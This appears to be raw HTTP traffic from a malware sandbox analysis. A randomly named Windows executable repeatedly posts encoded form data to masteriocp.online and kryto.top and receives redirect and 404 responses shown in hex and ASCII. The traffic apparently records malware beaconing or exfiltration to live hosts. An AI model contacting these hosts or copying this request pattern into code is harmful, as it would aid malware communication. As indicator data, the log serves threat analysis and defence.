                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:26.722345114 CEST782OUTPOST /wg84/ HTTP/1.1
                                          Host: www.masteriocp.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.masteriocp.online
                                          Referer: http://www.masteriocp.online/wg84/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 38 41 73 79 47 55 39 55 4f 75 4f 49 38 6d 66 4d 30 53 47 31 6b 33 74 6b 32 4a 36 76 2f 70 61 6b 4c 56 50 70 68 55 57 53 4c 4b 77 30 73 35 4b 4f 4c 78 64 72 64 79 36 79 66 42 78 30 43 65 42 4f 33 6e 46 50 64 33 48 69 4d 35 6e 64 6a 66 58 37 50 6c 41 6e 48 4e 68 39 4c 4e 39 34 46 34 67 30 41 56 76 33 50 5a 38 78 7a 58 66 76 49 74 52 64 37 46 78 70 6c 35 6c 54 72 75 70 4a 71 4e 66 61 6b 50 39 54 35 6f 51 39 78 6d 62 75 50 6d 50 56 6e 66 4c 50 72 68 2f 61 7a 31 4f 45 46 42 6d 75 4d 58 50 77 4b 32 6c 30 46 44 74 34 58 48 72 76 50 4e 73 43 66 53 33 46 52 47 5a 30 67 48 36 2f 4e 51 3d 3d
                                          Data Ascii: dxWljT6=8AsyGU9UOuOI8mfM0SG1k3tk2J6v/pakLVPphUWSLKw0s5KOLxdrdy6yfBx0CeBO3nFPd3HiM5ndjfX7PlAnHNh9LN94F4g0AVv3PZ8xzXfvItRd7Fxpl5lTrupJqNfakP9T5oQ9xmbuPmPVnfLPrh/az1OEFBmuMXPwK2l0FDt4XHrvPNsCfS3FRGZ0gH6/NQ==
                                          Sep 7, 2024 21:44:27.652952909 CEST368INHTTP/1.1 301 Moved Permanently
                                          Server: openresty
                                          Date: Sat, 07 Sep 2024 19:44:27 GMT
                                          Content-Type: text/html
                                          Content-Length: 166
                                          Connection: close
                                          Location: https://www.masteriocp.online/wg84/
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.45623918.139.62.226804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:29.276223898 CEST802OUTPOST /wg84/ HTTP/1.1
                                          Host: www.masteriocp.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.masteriocp.online
                                          Referer: http://www.masteriocp.online/wg84/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 38 41 73 79 47 55 39 55 4f 75 4f 49 39 47 76 4d 32 7a 47 31 6c 58 74 6e 71 5a 36 76 6d 5a 61 67 4c 56 7a 70 68 56 54 66 4c 38 59 30 73 62 43 4f 4b 77 64 72 61 79 36 79 51 68 78 74 64 75 42 5a 33 6e 4a 70 64 32 37 69 4d 35 44 64 6a 66 6e 37 49 57 6f 6d 47 64 68 37 66 39 39 32 49 59 67 30 41 56 76 33 50 5a 70 71 7a 54 7a 76 49 63 68 64 35 6b 78 6f 76 5a 6c 55 38 65 70 4a 37 39 66 65 6b 50 38 38 35 71 6b 54 78 6a 66 75 50 6a 7a 56 6e 75 4c 4f 34 42 2f 63 75 6c 50 59 4d 78 43 69 56 55 4b 59 56 30 46 73 4d 67 59 66 53 42 36 31 65 38 4e 56 4e 53 54 32 4d 42 51 41 74 45 48 32 57 65 36 48 6f 57 4f 49 47 58 6c 78 4d 66 6d 43 4e 74 75 65 41 75 34 3d
                                          Data Ascii: dxWljT6=8AsyGU9UOuOI9GvM2zG1lXtnqZ6vmZagLVzphVTfL8Y0sbCOKwdray6yQhxtduBZ3nJpd27iM5Ddjfn7IWomGdh7f992IYg0AVv3PZpqzTzvIchd5kxovZlU8epJ79fekP885qkTxjfuPjzVnuLO4B/culPYMxCiVUKYV0FsMgYfSB61e8NVNST2MBQAtEH2We6HoWOIGXlxMfmCNtueAu4=
                                          Sep 7, 2024 21:44:30.171544075 CEST368INHTTP/1.1 301 Moved Permanently
                                          Server: openresty
                                          Date: Sat, 07 Sep 2024 19:44:30 GMT
                                          Content-Type: text/html
                                          Content-Length: 166
                                          Connection: close
                                          Location: https://www.masteriocp.online/wg84/
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.45624018.139.62.226804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:31.824115992 CEST10884OUTPOST /wg84/ HTTP/1.1
                                          Host: www.masteriocp.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.masteriocp.online
                                          Referer: http://www.masteriocp.online/wg84/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 38 41 73 79 47 55 39 55 4f 75 4f 49 39 47 76 4d 32 7a 47 31 6c 58 74 6e 71 5a 36 76 6d 5a 61 67 4c 56 7a 70 68 56 54 66 4c 38 67 30 74 75 57 4f 4c 54 31 72 62 79 36 79 5a 42 78 6f 64 75 41 62 33 6e 52 74 64 32 32 58 4d 37 4c 64 79 4d 66 37 4a 6e 6f 6d 4a 64 68 37 41 74 39 37 46 34 68 70 41 56 2f 7a 50 5a 35 71 7a 54 7a 76 49 65 35 64 77 56 78 6f 70 5a 6c 54 72 75 70 46 71 4e 66 32 6b 50 31 4c 35 70 49 74 78 58 72 75 50 44 44 56 6c 38 54 4f 69 42 2f 65 74 6c 50 51 4d 78 2f 38 56 58 75 36 56 77 4e 57 4d 6e 77 66 66 56 37 68 5a 66 38 50 4f 42 6a 43 52 78 4d 2b 68 55 66 4f 54 2b 79 5a 73 32 2b 76 65 45 70 52 4d 63 72 74 61 4e 47 53 58 59 34 76 75 4b 6e 4c 36 72 69 68 4b 31 50 46 6e 4d 47 4c 6f 6f 43 62 35 64 74 35 68 4e 47 6c 50 4f 67 39 70 50 4e 6e 72 32 47 34 6f 4e 6b 42 46 58 31 6a 4c 78 35 4b 51 4b 63 62 59 64 7a 51 6e 79 66 77 53 35 31 67 56 52 56 47 57 38 4f 31 44 50 33 77 79 50 67 37 4e 76 58 75 31 61 6c 4a 4b 6e 4c 78 32 71 49 48 78 43 4a 57 4b 4e 45 70 79 6e 49 53 2f 43 [TRUNCATED]
                                          Data Ascii: dxWljT6=8AsyGU9UOuOI9GvM2zG1lXtnqZ6vmZagLVzphVTfL8g0tuWOLT1rby6yZBxoduAb3nRtd22XM7LdyMf7JnomJdh7At97F4hpAV/zPZ5qzTzvIe5dwVxopZlTrupFqNf2kP1L5pItxXruPDDVl8TOiB/etlPQMx/8VXu6VwNWMnwffV7hZf8POBjCRxM+hUfOT+yZs2+veEpRMcrtaNGSXY4vuKnL6rihK1PFnMGLooCb5dt5hNGlPOg9pPNnr2G4oNkBFX1jLx5KQKcbYdzQnyfwS51gVRVGW8O1DP3wyPg7NvXu1alJKnLx2qIHxCJWKNEpynIS/C5lOFUnHxh+qW5pf7cisHwW264j+0GhsUubZHYYcrjh4tKkm2pxbtrBG46NJu0nHF6Xu39Cn7GSv6PtoR6+C5Yxrrx/eEqMJDFXWWH4IwD5klO/i4Yt5IX3bMZHQw+B6buLZpPUFpk+RQblg3Fr7EmRAWNdRWCwxmTYVM4TldaC51dUn4O63ay48Bl8mFfQk1iaXGAggPqX1kvm25ZhyXoB/TdBU/r7CCJDdBD2Z7w9hq9xfIoZ6NaoW92ZsHB+NQY5n+m6IAAD6PdY+U7QpzJivS+yCDBz5psm3xmmVQcFFkVrqn2ueLZKAlhXyeXs2auYHs9M8VJhfR8iSyPN7BKAbZfclPGrdIZhR3dawdYSU8wEzCjKucwH4iWGNtc3olaKgxpIllPUaHHCpamtIGYe44FLsCzlDeselIp8L2QOa/xlOTamqIjOdET+j9PmSd/GlF8yrGG0pOtCfpSz+M4w2OJB0Vi9+0oIZ1GZNSyaDsIzrDqHsgMsc4I4MKWDU7wp8Gpilk49EAX+06k4qqPwulaEw+nmW+Np+zmHeUflLukCnfuO1sdYMnTHvM0x6/6Arp0O7T7XqCNIDE74JMsGZU4YndEWUr82ONwuUPlSJEinzAgaQQfJo3zxihk5N2tmnyZ+UvNTlLJddMoUCfi4gvMGLecMp/zv [TRUNCATED]
                                          Sep 7, 2024 21:44:32.744940996 CEST368INHTTP/1.1 301 Moved Permanently
                                          Server: openresty
                                          Date: Sat, 07 Sep 2024 19:44:32 GMT
                                          Content-Type: text/html
                                          Content-Length: 166
                                          Connection: close
                                          Location: https://www.masteriocp.online/wg84/
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          12192.168.2.45624118.139.62.226804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:34.367403030 CEST506OUTGET /wg84/?dxWljT6=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo=&GtLD=xFGdQ6FH HTTP/1.1
                                          Host: www.masteriocp.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:44:35.273915052 CEST511INHTTP/1.1 301 Moved Permanently
                                          Server: openresty
                                          Date: Sat, 07 Sep 2024 19:44:35 GMT
                                          Content-Type: text/html
                                          Content-Length: 166
                                          Connection: close
                                          Location: https://www.masteriocp.online/wg84/?dxWljT6=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo=&GtLD=xFGdQ6FH
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          13192.168.2.456242162.0.213.94804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:40.758582115 CEST758OUTPOST /09dt/ HTTP/1.1
                                          Host: www.kryto.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.kryto.top
                                          Referer: http://www.kryto.top/09dt/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 6d 5a 33 6d 36 51 61 33 5a 59 2f 32 46 53 57 4c 52 50 70 43 42 56 72 4a 36 77 68 6e 38 35 43 7a 56 67 49 6a 63 51 6d 41 36 41 49 42 70 4c 41 7a 42 64 30 38 79 55 6e 56 58 67 58 73 41 30 59 46 30 74 64 74 7a 75 6c 6e 53 4c 69 33 4b 79 55 38 35 47 5a 47 54 5a 63 66 79 5a 55 50 71 41 34 4c 43 43 4b 6f 77 70 34 33 75 6a 7a 4a 2b 62 78 6d 79 31 4f 43 57 2f 37 49 34 6d 53 57 57 36 61 4d 49 43 47 37 6d 6f 39 4f 44 45 44 6f 6b 32 48 38 4c 46 6f 32 62 54 37 6f 56 43 31 58 69 31 47 58 61 36 6c 66 74 51 46 75 52 56 52 37 45 79 34 66 57 31 78 4c 56 49 44 53 50 6e 38 53 56 73 4f 62 33 41 3d 3d
                                          Data Ascii: dxWljT6=mZ3m6Qa3ZY/2FSWLRPpCBVrJ6whn85CzVgIjcQmA6AIBpLAzBd08yUnVXgXsA0YF0tdtzulnSLi3KyU85GZGTZcfyZUPqA4LCCKowp43ujzJ+bxmy1OCW/7I4mSWW6aMICG7mo9ODEDok2H8LFo2bT7oVC1Xi1GXa6lftQFuRVR7Ey4fW1xLVIDSPn8SVsOb3A==
                                          Sep 7, 2024 21:44:41.380681038 CEST1236INHTTP/1.1 404 Not Found
                                          Date: Sat, 07 Sep 2024 19:44:41 GMT
                                          Server: Apache
                                          Content-Length: 16052
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                          Sep 7, 2024 21:44:41.380717993 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                          Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                          Sep 7, 2024 21:44:41.380731106 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                          Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                          Sep 7, 2024 21:44:41.381172895 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                          Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                          Sep 7, 2024 21:44:41.381184101 CEST1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                          Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                          Sep 7, 2024 21:44:41.381194115 CEST1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                          Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                          Sep 7, 2024 21:44:41.382145882 CEST1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                          Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                          Sep 7, 2024 21:44:41.382157087 CEST1236INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                          Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
                                          Sep 7, 2024 21:44:41.382165909 CEST1236INData Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33
                                          Data Ascii: 1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                          Sep 7, 2024 21:44:41.383023977 CEST1236INData Raw: 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72
                                          Data Ascii: ll-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567"
                                          Sep 7, 2024 21:44:41.387025118 CEST1236INData Raw: 2c 30 2e 31 31 38 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65
                                          Data Ascii: ,0.1183" style="fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4578-1"


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          14192.168.2.456243162.0.213.94804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:43.305522919 CEST778OUTPOST /09dt/ HTTP/1.1
                                          Host: www.kryto.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.kryto.top
                                          Referer: http://www.kryto.top/09dt/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 6d 5a 33 6d 36 51 61 33 5a 59 2f 32 48 79 47 4c 65 49 31 43 51 6c 72 47 30 51 68 6e 70 70 43 33 56 67 30 6a 63 55 2b 51 36 79 38 42 6e 4a 49 7a 41 63 30 38 31 55 6e 56 64 41 57 6d 64 45 59 53 30 73 68 54 7a 73 78 6e 53 49 65 33 4b 32 51 38 35 78 4e 48 54 4a 63 64 36 35 55 4a 75 41 34 4c 43 43 4b 6f 77 70 39 71 75 69 62 4a 2b 72 42 6d 67 41 36 42 59 66 37 58 73 32 53 57 64 61 61 41 49 43 47 5a 6d 70 68 6b 44 48 72 6f 6b 7a 44 38 50 45 6f 31 51 54 37 79 59 69 31 44 75 58 53 61 66 4c 5a 51 6c 44 74 41 50 6c 52 6f 4d 55 70 46 48 45 51 63 48 49 6e 68 53 67 31 6d 59 76 7a 53 73 41 50 62 55 56 72 32 36 6d 79 73 53 41 36 53 72 59 42 46 51 6f 73 3d
